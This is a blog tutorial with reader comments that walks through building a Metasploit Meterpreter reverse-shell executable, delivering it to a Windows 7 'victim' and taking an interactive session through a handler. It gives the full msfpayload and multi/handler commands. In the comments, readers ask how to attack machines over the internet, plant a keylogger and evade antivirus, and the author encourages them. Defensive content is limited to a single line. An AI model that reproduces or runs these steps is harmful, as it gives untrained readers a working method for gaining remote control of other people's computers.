• 8,103
  • 91
  • +458
  • 520
Create Simple Exploit Using Metasploit to Hack Windows 7

Create Simple Exploit Using Metasploit to Hack Windows 7

Bookmark

Type : Tutorial

Level : Easy

As I have already wrote on my previous post about how to add a user with administrator rights (you can read the tips and trick here), today I will wrote a simple tutorial to create an exploit for Windows 7 and all Windows.

Everyone love and like the simple way isn’t it? that’s why in my previous tutorial and today tutorial I wrote everything about simple and easy to use :-)

The tutorial today we will learn how to create a simple exploit (easy to create and easy to implement :-) ) and how we connect to Windows 7 victim that already executed our simple exploit…simple isn’t it?

Okay let’s start the tutorial.

Requirements :

1. Metasploit Framework 2. Windows XP and earlier Windows version (I use Windows 7 SP1)

Step by Step :

FYI in this tutorial I use Backtrack 5 R2 with Metasploit Framework 4.2.0, and my IP address is 192.168.8.91. 1. Open your terminal console and type the following command :

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.91 X > Desktop/v4L.exe

Create Simple Exploit Using Metasploit to Hack Windows 7

The above command will create Windows executable file with name "v4L.exe" and will be saved on your desktop.

2. Now you need to copy your newly created v4L.exe to your windows 7 system. If you didn’t know how to share your backtrack 5 folder, you can videw the tutorial how to share folder in your Backtrack (view tutorial here).

3. The next step we need to create a handler to handle the connection that came to our Backtrack system from simple exploit we’ve already created before. Open your Metasploit console, see the picture and type the following command : Create Simple Exploit Using Metasploit to Hack Windows 7 Information :

use exploit/multi/handler --> use the metasploit handler

set payload windows/meterpreter/reverse_tcp --> we use reverse_tcp (see step 1)

set lhost 192.168.8.91 --> set our local IP address that will catch the reverse connection

exploit -j -z --> start the handler

4. Now you can try to execute the simple exploit we have already copy to windows 7 and see if our handler receiving something or not. Below was the screenshot of my handler when Windows 7 executed the simple exploit : Create Simple Exploit Using Metasploit to Hack Windows 7

I use sessions -l to listing every sessions that already open there. 5. To interact with the available session, you can use sessions -i <session_id>. From there you can do other command as you want.

Create Simple Exploit Using Metasploit to Hack Windows 7

Yes we’re inside the Windows 7 now :-)

Countermeasures :

1. Install 3rd party firewall and antivirus that always updated.

Hope it’s useful :-)

FYI : There’s still another tutorial I will post later about Hacking Remote Desktop. You can subscribe to get the tutorial by click the button below and provide your e-mail address :

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

19 Responsesto “Create Simple Exploit Using Metasploit to Hack Windows 7”

  1. hair says:

    hi man… nice post ! please help me how to make it remotly? on win xp its possible? 
     
    please send to my email   *about Hacking Remote Desktop …thanxs a lot i needy learn to working in security test  >X

  2. BlackTrminatr says:

    Nice post.. but can you tell me how to do this remotely… I have configured my router for port forwarding but don’t know what to do next..

    Thanks

    • v4L says:

      #BlackTrminatr
      You need to understand how exploit and payload work. maybe you can give a try to see the simple explanation in this tutorial http://www./hacking-tutorial/hacking-into-xp-sp3-via-microsoft-office-excel-ms11_021_xlb_bof-vulnerability/ about lport, lhost; and I think this tutorial clear enough for the basic http://www./hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/

  3. nathan says:

    hey man, awsome blog!
    Quick question, wondering whether its possible to add a .exe keylogger after the exploit has occured and place it on the victims computer and somehow click it so it activates

  4. Prakash Tomar says:

    Hey man i just creatd an account in 000webhost..free web hosting site..nd der i redirect my own website url to google.com..bt nw wat i have to do i’m nt getting to hack wan computer..i knw i have to create a payload and listener bt wat bout server..plz help me..

  5. r12 says:

    I am using dongle with dynamic IP. I am using host name from no-ip.com to redirect my dynamic IP address. so I typed this to create .exe file:
    “””msfpayload windows/meterpreter/reverse_tcp LHOST=myhostname.zapto.org X > Desktop/v4l.exe”””

    and then I set up the handler and payload and set the lhost:
    “””set lhost myhostname.zapto.org”””

    but when I execute exploit command there’s an error:
    “””Handler failed to bind to 180.214.233.37:4444″””

    ps: 180.214.233.37 is my current dynamic global IP address

    what should I do? help me plz….

  6. r12 says:

    I am able to use msf on virtual LAN. thanks for your tutorials. but I want to do it over internet, FYI I don’t have router, I only have a computer and a dongle. Do you have any idea on error message I have shown you above? oh ya inspite of error, I try to execute the .exe on my friends computer. but there is no session appear on server machine.
    any help would be really appreciated. THANKS

  7. gabeapp says:

    lets say i will be able to get the file on the victims computer how can i use this if the target is on an external location?

  8. shinobi says:

    Hi my friend, i'd like to thank you for this post, and i also appreciate your easy way of explainiing things. However, what's the usefulness of this tutorial since it can NEVER bypass any security measures, and why do you specify this attack to windows 7?? this exe meterpreter can be used on any microsoft system, ONLY of firewalls & antiviruses are disabled :-(

    • v4L says:

      #shinobi
      you didn’t feel the usefulness because you want the fast and easy way :-)
      with all of this you also can build a new one without caught by antivirus, but of course for all of it you need an effort to learn more after you know the basic.

  9. Ahmed El-Nagdy says:

    Thanks 4 ur efforts:
    But …
    I am try to run this “exploit” to hake xp-sp3
    The result is:
    msf exploit(ms08_067_netapi) > exploit -j -z
    [*] Exploit running as background job.

    [-] Handler failed to bind to 192.168.201.135:4444
    [-] Handler failed to bind to 0.0.0.0:4444
    [-] Exploit failed: Rex::AddressInUse The address is already in use (0.0.0.0:4444).

    I am waiting ur answer
    Please Accept My Best Regards.

  10. Stanko says:

    Hi,

    I have two computers, one, my mac which running BT5r3 on VMware fusion and a windows 7 laptop. They are both connected to the same WLAN, same router, everything. Which tutorial do i follow to exploit the windows 7 laptop? Because even though I disable my firewall/AV I’m still having problems on armtiage/fast-track, etc :/

    • v4L says:

      #Stanko

      you can start learn from here http://www./tips-and-trick/install-metasploitable-on-virtual-box/. and you can try use your armitage. we can’t only run armitage and hopw finding a red vulnerable PC when scanning, because nowadays the vulnerability come from 3rd party application. Maybe updating your armitage + metasploit framework is a good idea to start.

Leave a Reply

Your email address will not be published. Required fields are marked *